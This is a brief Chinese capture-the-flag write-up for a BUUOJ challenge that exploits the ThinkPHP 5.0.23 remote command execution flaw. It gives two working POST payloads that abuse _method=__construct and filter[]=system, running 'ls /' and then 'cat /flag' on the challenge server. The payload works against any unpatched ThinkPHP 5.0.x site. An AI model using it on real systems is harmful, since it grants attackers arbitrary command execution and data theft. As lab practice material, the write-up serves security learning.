進入首頁:
首頁告訴了我們是thinkphp5的漏洞。
知道了是哪個版本的話就搜一搜嘍:最后發現是thinkphp5.0.23的命令執行
payload_1:查看根目錄文件,發現flag位置
http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
payload_2:讀取flag
http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag